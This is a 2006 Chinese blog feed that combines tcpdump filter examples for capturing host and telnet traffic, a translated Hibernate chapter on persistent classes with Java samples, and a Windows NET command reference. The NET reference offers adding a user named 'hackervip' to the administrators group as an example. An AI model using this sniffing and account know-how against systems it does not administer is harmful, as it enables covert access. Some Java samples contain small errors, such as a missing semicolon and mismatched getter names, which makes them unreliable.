K 想要截获主机210.27.48.1 和主机210.27.48.2 或210.27.48.3的通信，使用命令
：（在命令行中适用　　　括号时，一定要
#tcpdump host 210.27.48.1 and \ (210.27.48.2 or 210.27.48.3 \)

L 如果想要获取主机210.27.48.1除了和主机210.27.48.2之外所有主机通信的ip包，使用命令：
　　　#tcpdump ip host 210.27.48.1 and ! 210.27.48.2

M 如果想要获取主机210.27.48.1接收或发出的telnet包，使用如下命令：
　　　#tcpdump tcp port 23 host 210.27.48.1

第三种是协议的关键字，主要包括fddi,ip ,arp,rarp,tcp,udp等类型
除了这三种类型的关键字之外，其他重要的关键字如下：gateway, broadcast,less,
greater,还有三种逻辑运算，取非运算是 'not ' '! ', 与运算是'and','&&';或运算是'o
r' ,'||'；
第二种是确定传输方向的关键字，主要包括src , dst ,dst or src, dst and src ,
如果我们只需要列出送到80端口的数据包，用dst port；如果我们只希望看到返回80端口的数据包，用src port。
#tcpdump –i eth0 host hostname and dst port 80  目的端口是80
或者
#tcpdump –i eth0 host hostname and src port 80  源端口是80  一般是提供http的服务的主机
如果条件很多的话  要在条件之前加and 或 or 或 not
#tcpdump -i eth0 host ! 211.161.223.70 and ! 211.161.223.71 and dst port 80

如果在ethernet 使用混杂模式系统的日志将会记录

May  7 20:03:46 localhost kernel: eth0: Promiscuous mode enabled.
May  7 20:03:46 localhost kernel: device eth0 entered promiscuous mode
May  7 20:03:57 localhost kernel: device eth0 left promiscuous mode

tcpdump对截获的数据并没有进行彻底解码，数据包内的大部分内容是使用十六进制的形式直接打印输出的。显然这不利于分析网络故障，通常的解决办法是先使用带-w参数的tcpdump 截获数据并保存到文件中，然后再使用其他程序进行解码分析。当然也应该定义过滤规则，以避免捕获的数据包填满整个硬盘

forrest 2006-12-27 14:43 发表评论

第 5 章 O/R Mapping基础

forrest — Thu, 31 Aug 2006 10:34:00 GMT

摘要: 第 5 章 O/R Mapping基础上一页下一页 ... 阅读全文

forrest 2006-08-31 18:34 发表评论

第 4 章持久化类(Persistent Classes)

forrest — Thu, 31 Aug 2006 10:33:00 GMT


上一页		下一页

第 4 章持久化类(Persistent Classes)

持久化类是应用程序用来解决商业问题的类（比如，在电子交易程序中的Customer和Order）。持久化类，就如同它的名字暗示的，是短暂存在的，它的实例会被持久性保存于数据库中。

如果这些类符合简单的规则，Hibernate能够工作得最好，这些规则就是Plain Old Java Object (POJO，简单传统Java对象)编程模型。

4.1. POJO简单示例

大多数java程序需要一个持久化类的表示方法。

package eg;
import java.util.Set;
import java.util.Date;

public class Cat {
    private Long id; // identifier
    private String name;
    private Date birthdate;
    private Cat mate;
    private Set kittens
    private Color color;
    private char sex;
    private float weight;

    private void setId(Long id) {
        this.id=id;
    }
    public Long getId() {
        return id;
    }

    void setName(String name) {
        this.name = name;
    }
    public String getName() {
        return name;
    }

    void setMate(Cat mate) {
        this.mate = mate;
    }
    public Cat getMate() {
        return mate;
    }

    void setBirthdate(Date date) {
        birthdate = date;
    }
    public Date getBirthdate() {
        return birthdate;
    }
    void setWeight(float weight) {
        this.weight = weight;
    }
    public float getWeight() {
        return weight;
    }

    public Color getColor() {
        return color;
    }
    void setColor(Color color) {
        this.color = color;
    }
    void setKittens(Set kittens) {
        this.kittens = kittens;
    }
    public Set getKittens() {
        return kittens;
    }
    // addKitten not needed by Hibernate
    public void addKitten(Cat kitten) {
        kittens.add(kitten);
    }
    void setSex(char sex) {
        this.sex=sex;
    }
    public char getSex() {
        return sex;
    }
}

有四条主要的规则：

4.1.1. 为持久化字段声明访问器(accessors)和是否可变的标志(mutators)

Cat为它的所有可持久化字段声明了访问方法。很多其他ORM工具直接对实例变量进行持久化。我们相信在持久化机制中不限定这种实现细节，感觉要好得多。Hibernate对JavaBeans风格的属性实行持久化，采用如下格式来辨认方法：getFoo, isFoo 和 setFoo。

属性不一定需要声明为public的。Hibernate可以对default,protected或者private的get/set方法对的属性一视同仁地执行持久化。

4.1.2. 实现一个默认的构造方法（constructor）

Cat有一个显式的无参数默认构造方法。所有的持久化类都必须具有一个默认的构造方法（可以不是public的），这样的话Hibernate就可以使用Constructor.newInstance()来实例化它们。

4.1.3. 提供一个标识属性（identifier property）（可选）

Cat有一个属性叫做id。这个属性包含了数据库表中的主关键字字段。这个属性可以叫任何名字，其类型可以是任何的原始类型、原始类型的包装类型、java.lang.String 或者是 java.util.Date。（如果你的老式数据库表有联合主键，你甚至可以用一个用户自定义的类，其中每个属性都是这些类型之一。参见后面的关于联合标识符的章节。）

用于标识的属性是可选的。你可以不管它，让Hibernate内部来追踪对象的识别。当然，对于大多数应用程序来说，这是一个好的（也是很流行的）设计决定。

更进一步，一些功能只能对声明了标识属性的类起作用：

级联更新（Cascaded updates）（参阅“自管理生命周期的对象（Lifecycle Objects）”）
Session.saveOrUpdate()

我们建议你对所有的持久化类采取同样的名字作为标识属性。更进一步，我们建议你使用一个可以为空（也就是说，不是原始类型）的类型。

4.1.4. 建议使用不是final的类 (可选)

Hibernate的关键功能之一，代理（proxies），要求持久化类不是final的，或者是一个全部方法都是public的接口的具体实现。

你可以对一个final的，也没有实现接口的类执行持久化，但是不能对它们使用代理——多多少少会影响你进行性能优化的选择。

4.2. 实现继承（Inheritance）

子类也必须遵守第一条和第二条规则。它从Cat继承了标识属性。

package eg;

public class DomesticCat extends Cat {
        private String name;

        public String getName() {
                return name;
        }
        protected void setName(String name) {
                this.name=name;
        }
}

4.3. 实现`equals()`和`hashCode()`

如果你需要混合使用持久化类（比如，在一个Set中），你必须重载equals() 和 hashCode()方法。

这仅适用于那些在两个不同的Session中装载的对象，Hibernate在单个Session中仅保证JVM 辨别（ a == b ，equals()的默认实现）！

就算两个对象a和b实际是同一行数据库内容（它们拥有同样的主键值作为辨识符），我们也不能保证在特定的Session 之外它们是同一个Java实例。

最显而易见的实现equals()/hashCode()方法的办法就是比较两个对象的标识值。如果这个值是同堂的，他们必定是直线同一条数据库行，所以它们是相等的（如果都被加入到Set，在Set中只应该出现一个元素）。不幸的是，我们不能使用这种办法。Hibernate只会对已经持久化的对象赋予标识值，新创建的实例将不会有任何标识符值！我们推荐使用商业关键字相等原则来实现equals()和hashCode()。

商业关键字相等意味着equals()方法只比较那些组成商业关键字的属性，它对应着真实世界中的实例（自然的候选关键字）

public class Cat {

    ...
    public boolean equals(Object other) {
        if (this == other) return true;
        if (!(other instanceof Cat)) return false;

        final Cat cat = (Cat) other;

        if (!getName().equals(cat.getName())) return false;
        if (!getBirthday().equals(cat.getBirthday())) return false;

        return true;
    }

    public int hashCode() {
        int result;
        result = getName().hashCode();
        result = 29 * result + getBirthday().hashCode();
        return result;
    }

}

记住我们的候选关键字（这个例子中是名字和生日的组合）只在特定的比较操作中有效（可能只在一个用例中）。我们不需要我们通常用于正式主键那么严格稳定的条件。

4.4. 持久化生命周期（Lifecycle）中的回调（Callbacks）

作为一个可选的步骤，可持久化类可以实现Lifecycle接口，它可以提供一些用于回调的方法，可以让持久化对象在save或load之后，或者在delete或update之前进行必要的初始化与清除步骤。

Hibernate Interceptor（拦截器）还提供了一种较少干扰的替代方法。

public interface Lifecycle {
        public boolean onSave(Session s) throws CallbackException;   (1)
        public boolean onUpdate(Session s) throws CallbackException; (2)
        public boolean onDelete(Session s) throws CallbackException; (3)
        public void onLoad(Session s, Serializable id);              (4)
}

(1)	`onSave` - 在对象即将被save或者insert的时候回调
(2)	`onUpdate` - 在对象即将被update的时候回调（也就是对象被传递给`Session.update()`的时候)
(3)	`onDelete` - 在对象即将被delete(删除)的时候回调
(4)	`onLoad` - 在对象刚刚被load(装载)后的时候回调

onSave(), onDelete() 和 onUpdate() 可以被用来级联保存或者删除依赖的对象。这种做法是在映射文件中声明级联操作外的另外一种选择。onLoad()可以用来让对象从其持久化（当前）状态中初始化某些暂时的属性。不能用这种方式来装载依赖的对象，因为可能无法在此方法内部调用Session接口。 onLoad(), onSave()和 onUpdate()另一种用法是用来在当前Session中保存一个引用，已备后用。

请注意onUpdate()并不是在每次对象的持久化状态被更新的时候就被调用的。它只在处于尚未被持久化的对象被传递给Session.update()的时候才会被调用。

如果onSave(), onUpdate() 或者 onDelete()返回true，那么操作就被悄悄地取消了。如果其中抛出了CallbackException异常，操作被取消，这个异常会被继续传递给应用程序。

请注意onSave()是在标识符已经被赋予对象后调用的，除非是使用本地(native)方式生成关键字的。

4.5. 合法性检查（Validatable）回调

如果持久化类需要在保存其持久化状态前进行合法性检查，它可以实现下面的接口：

public interface Validatable {
        public void validate() throws ValidationFailure;
}

如果发现对象违反了某条规则，应该抛出一个ValidationFailure异常。在Validatable实例的validate()方法内部不应该改变它的状态。

和Lifecycle接口的回调方法不同，validate()可能在任何时间被调用。应用程序不应该把validate()调用和商业功能联系起来。

4.6. XDoclet标记示例

下一章中我们将会展示Hibernate映射是如何用简单的，可阅读的XML格式表达的。很多Hibernate用户喜欢使用XDoclet的@hibernate.tags标签直接在源代码中嵌入映射信息。我们不会在这份文档中讨论这个话题，因为严格的来说这属于XDoclet的一部分。但我们仍然在这里给出一份带有XDoclet映射的Cat类的示例。

package eg;
import java.util.Set;
import java.util.Date;

/**
 * @hibernate.class
 *  table="CATS"
 */
public class Cat {
    private Long id; // identifier
    private Date birthdate;
    private Cat mate;
    private Set kittens
    private Color color;
    private char sex;
    private float weight;

    /**
     * @hibernate.id
     *  generator-class="native"
     *  column="CAT_ID"
     */
    public Long getId() {
        return id;
    }
    private void setId(Long id) {
        this.id=id;
    }

    /**
     * @hibernate.many-to-one
     *  column="MATE_ID"
     */
    public Cat getMate() {
        return mate;
    }
    void setMate(Cat mate) {
        this.mate = mate;
    }

    /**
     * @hibernate.property
     *  column="BIRTH_DATE"
     */
    public Date getBirthdate() {
        return birthdate;
    }
    void setBirthdate(Date date) {
        birthdate = date;
    }
    /**
     * @hibernate.property
     *  column="WEIGHT"
     */
    public float getWeight() {
        return weight;
    }
    void setWeight(float weight) {
        this.weight = weight;
    }

    /**
     * @hibernate.property
     *  column="COLOR"
     *  not-null="true"
     */
    public Color getColor() {
        return color;
    }
    void setColor(Color color) {
        this.color = color;
    }
    /**
     * @hibernate.set
     *  lazy="true"
     *  order-by="BIRTH_DATE"
     * @hibernate.collection-key
     *  column="PARENT_ID"
     * @hibernate.collection-one-to-many
     */
    public Set getKittens() {
        return kittens;
    }
    void setKittens(Set kittens) {
        this.kittens = kittens;
    }
    // addKitten not needed by Hibernate
    public void addKitten(Cat kitten) {
        kittens.add(kitten);
    }

    /**
     * @hibernate.property
     *  column="SEX"
     *  not-null="true"
     *  update="false"
     */
    public char getSex() {
        return sex;
    }
    void setSex(char sex) {
        this.sex=sex;
    }
}

上一页	上一级	下一页
第 3 章 SessionFactory配置	起始页	第 5 章 O/R Mapping基础

forrest 2006-08-31 18:33 发表评论

第 1 章在Tomcat中快速上手第 2 章体系结构第 3 章 SessionFactory配置

forrest — Thu, 31 Aug 2006 10:32:00 GMT

摘要: 第 1 章在Tomcat中快速上手上一页下一页第... 阅读全文

forrest 2006-08-31 18:32 发表评论

------------NET命令大全------(下)

forrest — Wed, 30 Aug 2006 06:54:00 GMT

参数介绍：我们来看看这些服务都是什么

　　<1>alerter(警报)

　　<2>client service for netware(Netware 客户端服务)

　　<3>clipbook server(剪贴簿服务器)

　　<4>computer browser(计算机浏览器)

　　<5>directory replicator(目录复制器)

　　<6>ftp publishing service (ftp )(ftp 发行服务)

　　<7>lpdsvc

　　<8>net logon(网络登录) <9>network dde网络 dde)

　　<10>network dde dsdm(网络 dde dsdm)

　　<11>network monitor agent(网络监控代理)

　　<12>nt lm security support provider(NT LM 安全性支持提供)

　　<13>ole(对象链接与嵌入)

　　<14>remote access connection manager(远程访问连接管理器)

　　<15>remote access isnsap service(远程访问 isnsap 服务)

　　<16>remote access server(远程访问服务器)

　　<17>remote procedure call (rpc) locator(远程过程调用定位器)

　　<18>remote procedure call (rpc) service(远程过程调用服务)

　　<19>schedule(调度)

　　<20>server(服务器)

　　<21>simple tcp/ip services(简单 TCP/IP 服务)

　　<22>snmp

　　<23>spooler(后台打印程序)

　　<24>tcp/ip netbios helper(TCP/IP NETBIOS 辅助工具)

　　<25>ups (26)workstation(工作站)

　　<27>messenger(信使)

　　<28>dhcp client

　　<29>eventlog 以下这些SERVICE只能在NT SERVER上使用

　　<< 1>> )file server for macintosh

　　<<2>>gateway service for netware

　　<<3>>microsoft dhcp server

　　<<4>>print server for macintosh

　　<<5>>remoteboot

　　<<6>>windows internet name service

　　(9)Net Statistics

　　作用：显示本地工作站或服务器服务的统计记录。

　　命令格式：net statistics [workstation │ server]

　　参数介绍：

　　<1>键入不带参数的net statistics列出其统计信息可用的运行服务。 <2>workstation显示本地工作站服务的统计信息。

　　<3>server显示本地服务器服务的统计信息。

　　简单事例:

　　<1>net statistics server │ more显示服务器服务的统计信息

(10)Net Share

　　作用：创建、删除或显示共享资源。

　　命令格式：net share sharename=drive:path [/users:number │ /unlimited] [/remark:"text"]

　　参数介绍：

　　<1>键入不带参数的net share显示本地计算机上所有共享资源的信息。

　　

　　<2>sharename是共享资源的网络名称。

　　

　　<3>drive:path指定共享目录的绝对路径。

　　<4>/users:number设置可同时访问共享资源的最大用户数。

　　<5>/unlimited不限制同时访问共享资源的用户数。

　　<6>/remark:"text "添加关于资源的注释，注释文字用引号引住。

　　<7>/delete停止共享资源

　　

　　<8>启动共享资源

　　

　　(11)Net Session

　　作用：列出或断开本地计算机和与之连接的客户端的会话，也可以写为net sessions或net sess。

　　命令格式：net session [\\computername] [/delete]

　　参数介绍：

　　<1>键入不带参数的net session显示所有与本地计算机的会话的信息。

　　<2>\\computername标识要列出或断开会话的计算机。

　　<3>/delete结束与\\computername计算机会话并关闭本次会话期间计算机的所有?

　　简单事例：

　　<1>net session \\YFANG要显示计算机名为YFANG的客户端会话信息列表。

　　(12)Net Send

　　作用：向网络的其他用户、计算机或通信名发送消息。

　　命令格式：net send {name │ * │ /domain[:name] │ /users} message 参数介绍：

　　<1>name要接收发送消息的用户名、计算机名或通信名。

　　<2>*将消息发送到组中所有名称。

　　<3>/domain[:name]将消息发送到计算机域中的所有名称。

　　<4>/users将消息发送到与服务器连接的所有用户。

　　<5>message作为消息发送的文本。

　　简单事例：

　　<1>net send /users server will shutdown in 5 minutes. 给所有连接到服务器的用户发送消息

　　(13)Net Print

　　作用：显示或控制打印作业及打印队列。

　　命令格式：net print [\\computername ] job# [/hold │ /release │ /delete]

　　参数介绍：

　　<1>computername共享打印机队列的计算机名。

　　<2>sharename打印队列名称。

　　<3>job#在打印机队列中分配给打印作业的标识号。

　　<4>/hold使用 job# 时，在打印机队列中使打印作业等待。

　　<5>/release释放保留的打印作业。

　　<6>/delete从打印机队列中删除打印作业。

　　简单事例：

　　<1>net print \\YFANG\SEEME列出\\YFANG计算机上SEEME打印机队列的目录

　　(14)Net Name

　　作用：添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。

　　命令格式：net name [name [/add │ /delete]]

　　参数介绍：

　　<1>键入不带参数的net name列出当前使用的名称。

　　<2>name指定接收消息的名称。

　　<3>/add将名称添加到计算机中。

　　<4>/delete从计算机中删除名称。

(15)Net Localgroup

　　作用：添加、显示或更改本地组。

　　命令格式：net localgroup groupname {/add [/comment:"text "] │ /delete} [/domain]

　　参数介绍：

　　<1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。

　　

　　<2>groupname要添加、扩充或删除的本地组名称。显示某个组的信息。

　　

　　<3>/comment: "text "为新建或现有组添加注释。

　　<4>/domain在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作?

　　<5>name [ ...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名。

　　<6>/add将全局组名或用户名添加到本地组中。比如把用户hackervip添加到administrators组里边。

　　

　　<7>/delete从本地组中删除组名或用户名。比如把用户hackervip从administrators组里边删除。

　　

(16)Net Group

　　作用：在 Windows NT Server 域中添加、显示或更改全局组。

　　命令格式：net group groupname {/add [/comment:"text "] │ /delete} [/domain]

　　参数介绍：

　　<1>键入不带参数的net group显示服务器名称及服务器的组名称。

　　<2>groupname要添加、扩展或删除的组。

　　<3>/comment:"text "为新建组或现有组添加注释。 <4>/domain在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作?

　　<5>username[ ...]列表显示要添加到组或从组中删除的一个或多个用户。

　　<6>/add添加组或在组中添加用户名。

　　<7>/delete删除组或从组中删除用户名。

　　简单事例：

　　<1>net group love yfang1 yfang2 /add将现有用户帐号yfang1和yfang2添加到本地计算机的love组

　　(17)Net File

　　作用：显示某服务器上所有打开的共享文件名及锁定文件数。

　　命令格式：net file [id [/close]]

　　参数介绍：

　　<1>键入不带参数的net file获得服务器上打开文件的列表。

　　<2>id文件标识号。

　　<3>/close关闭打开的文件并释放锁定记录。

　　(18)Net Config

　　作用：显示当前运行的可配置服务，或显示并更改某项服务的设置。

　　命令格式：net config [service [options]]

　　参数介绍：

　　<1>键入不带参数的net config显示可配置服务的列表。

　　<2>service通过net config命令进行配置的服务(server或workstation)

　　<3>options服务的特定选项。

　　(19)Net Computer

　　作用：从域数据库中添加或删除计算机。

　　命令格式：net computer \\computername {/add │ /del}

　　参数介绍：

　　<1>\\computername指定要添加到域或从域中删除的计算机。

　　<2>/add将指定计算机添加到域。

　　<3>/del将指定计算机从域中删除。

　　简单事例：

　　<1>net computer \\cc /add将计算机 cc 添加到登录域　　

(20)Net Accounts

　　作用：更新用户帐号数据库、更改密码及所有帐号的登录要求。

　　命令格式：net accounts [/forcelogoff:{minutes │ no}] [/minpwlen:length] [/maxpwage:{days │ unlimited}] [/minpwageays] [/uniquepw:number] [/domain]

　　参数介绍：

　　<1>键入不带参数的net accounts显示当前密码设置、登录时限及域信息。

　　<2>/forcelogoff:{minutes │ no}设置当用户帐号或有效登录时间过期时

　　<3>/minpwlen:length设置用户帐号密码的最少字符数。

　　<4>/maxpwage:{days │ unlimited}设置用户帐号密码有效的最大天数。

　　<5>/minpwageays设置用户必须保持原密码的最小天数。

　　<6>/uniquepw:number要求用户更改密码时，必须在经过number次后才能重复使用与之相同的密码。

　　<7>/domain在当前域的主域控制器上执行该操作。 <8>/sync当用于主域控制器时，该命令使域中所有备份域控制器同步

　　简单事例：

　　<1>net accounts /minpwlen:7

　　将用户帐号密码的最少字符数设置为7

　　-----------上面介绍的是NET命令在WINNT下的基本用法

　　-----------下面我们看看NET命令在WIN98下的基本用法

　　在WIN98中NET命令也有一些参数其中有一些参数的名字和功能及简单的使用方法和WINNT下的相应的参数的用法相同

　　其中有

　　(1)NET TIME命令

　　(2)NET PRINT命令

　　(3)NET USE命令

　　(4)NET VIEW命令

　　在WIN98中NET命令有一些参数其中有一些参数的名字和WINNT下的相应的参数的名字相同但其用法却有些不同

　　其中有

　　(1)NET START

　　作用：启动相应的服务。(不能在DOS-WIN中用)

　　命令格式：NET START [BASIC │ NWREDIR │ WORKSTATION │ NETBIND │ NETBEUI │ NWLINK] [/LIST] [/YES] [/VERBOSE]

　　(2)NET STOP

　　作用：停止相应的服务.(不能在DOS-WIN中用)

　　命令格式：NET STOP [BASIC │ NWREDIR │ WORKSTATION │ NETBEUI │ NWLINK] [/YES]

　　在WIN98中NET命令还有一些参数是在98下才有的

　　其中有

　　(1)NET DIAG

　　作用：运行MS的DIAGNOSTICS程序显示网络的DIAGNOSTIC信息

　　命令格式：NET DIAGNOSTICS [/NAMES │ /STATUS]

　　(2)NET INIT

　　作用：不通过绑定来加载协议或网卡驱动(不能在DOS-WIN中用)

　　命令格式：NET INITIALIZE [/DYNAMIC]

　　(3)NET LOGOFF

　　作用：断开连接的共享资源(不能在DOS-WIN中用)

　　(4)NET LOGON

　　作用：在WORKGROUP中登陆(不能在DOS-WIN中用)

　　命令格式：NET LOGON [user [password │ ?]] [/DOMAIN:name] [/YES] [/SAVEPW:NO]

　　(5)NET PASSWORD

　　作用：更改你的网络登陆口令(不能在DOS-WIN中用)

　　命令格式：NET PASSWORD \\computer │ /DOMAIN:name [user [oldpassword [newpassword]]]

你可以通过这个链接引用该篇文章:http://hackerpp.bokee.com/tb.b?diaryId=10417426

forrest 2006-08-30 14:54 发表评论

IT博客-forrest-文章分类-NET

SYN Flood攻击的基本原理及防御

详细Tcpdump 的用法

第 5 章 O/R Mapping基础

第 4 章 持久化类(Persistent Classes)

第 4 章 持久化类(Persistent Classes)

4.1. POJO简单示例

4.1.1. 为持久化字段声明访问器(accessors)和是否可变的标志(mutators)

4.1.2. 实现一个默认的构造方法（constructor）

4.1.3. 提供一个标识属性（identifier property）（可选）

4.1.4. 建议使用不是final的类 (可选)

4.2. 实现继承（Inheritance）

4.3. 实现equals()和hashCode()

4.4. 持久化生命周期（Lifecycle）中的回调（Callbacks）

4.5. 合法性检查（Validatable）回调

4.6. XDoclet标记示例

第 1 章 在Tomcat中快速上手 第 2 章 体系结构 第 3 章 SessionFactory配置

------------NET命令大全------(下)

第 4 章持久化类(Persistent Classes)

第 4 章持久化类(Persistent Classes)

4.3. 实现`equals()`和`hashCode()`

第 1 章在Tomcat中快速上手第 2 章体系结构第 3 章 SessionFactory配置